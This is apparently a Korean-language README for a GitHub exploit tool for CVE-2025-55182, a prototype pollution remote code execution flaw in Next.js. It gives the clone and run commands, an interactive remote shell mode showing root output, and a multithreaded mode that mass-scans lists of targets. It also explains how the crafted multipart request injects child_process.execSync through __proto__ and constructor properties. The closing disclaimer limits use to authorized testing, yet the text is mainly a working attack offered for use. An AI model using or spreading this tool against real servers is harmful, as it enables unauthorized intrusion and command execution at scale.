
CVE-2025-55182 익스플로잇 도구 – Next.js 프로토타입 오염으로 인한 RCE를 위한 Python 2.7 익스플로잇
CVE-2025-55182에 대한 Python 2.7 익스플로잇 – Next.js 애플리케이션의 치명적인 프로토타입 오염 / RCE 취약점입니다.
이 도구는 단일 대상 대화형 셸과 다중 호스트의 대규모 스캔을 모두 지원하며, 멀티스레딩, 컬러풀 출력, 자동 HTTPS 폴백을 제공합니다.
https:// 자동 추가id를 원하는 명령(whoami, ls 등)으로 변경 가능requests만 필요 (쉽게 설치 가능)requests 라이브러리 – 다음 명령으로 설치:
pip install requests
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
스크립트를 실행 가능하게 만듭니다 (선택 사항):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
또는 프로토콜 없이 (HTTPS가 자동으로 추가됨):
python2 CVE-2025-55182.py target.com
연결 및 취약 확인 후 셸 프롬프트가 나타납니다:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
내장 명령어:
exit / quit – 셸 종료clear – 화면 지우기help – 도움말 표시한 줄에 하나의 대상이 있는 파일을 준비합니다 (http/https 포함 또는 미포함):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
대량 스캔 실행 (기본값: 10개 스레드, 명령어 id, 출력 파일 res.txt):
python2 CVE-2025-55182.py targets.txt
스레드, 명령어, 출력 파일 사용자 정의:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
20 – 스레드 수whoami – 각 취약 대상에서 실행할 명령어results.txt – 출력 파일 (취약한 항목만 저장)대량 스캔 출력 예시:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
저장된 결과 (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
이 익스플로잇은 Next.js 엔드포인트(/login, 경로가 비어 있으면 추가됨)에 조작된 multipart/form-data 요청을 보냅니다.
프로토타입 오염(__proto__:then 및 constructor:constructor)을 악용하여 child_process.execSync()를 사용해 시스템 명령을 실행하는 악성 접두사를 주입합니다.
서버는 x-action-redirect 헤더(또는 Location)에 명령 출력을 포함한 303 리디렉션으로 응답합니다.
도구는 /login?a=<output>에서 결과를 추출합니다.
이 도구는 교육 목적과 공인된 보안 테스트 전용으로 제작되었습니다. 승인되지 않은 시스템 접근은 불법입니다. 저자는 이 소프트웨어의 오용이나 손해에 대해 어떠한 책임도 지지 않습니다. 이 익스플로잇을 사용하기 전에 대상 시스템 소유자의 명시적인 서면 허가를 받아야 합니다.
더 자세한 면책 조항은 Jenderal92의 표지에서 확인할 수 있습니다. 여기를 확인하세요!!!